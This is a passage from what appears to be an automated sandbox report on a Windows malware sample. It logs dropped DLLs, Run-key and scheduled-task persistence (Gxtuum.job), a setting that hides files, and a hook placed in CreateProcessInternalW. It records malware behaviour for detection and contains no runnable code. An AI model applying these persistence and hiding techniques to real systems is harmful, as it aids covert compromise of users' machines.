                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\_lzma.pydJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeFile created: C:\Windows\Tasks\Gxtuum.job
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ServicesJump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ServicesJump to behavior

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Source: C:\Windows\System32\audiodg.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced HiddenJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessInternalW new code: 0xE9 0x90 0x00 0x07 0x75 0x5F
                              Source: C:\Windows\explorer.exeCode function: 4_2_09825590 LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_09825590
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
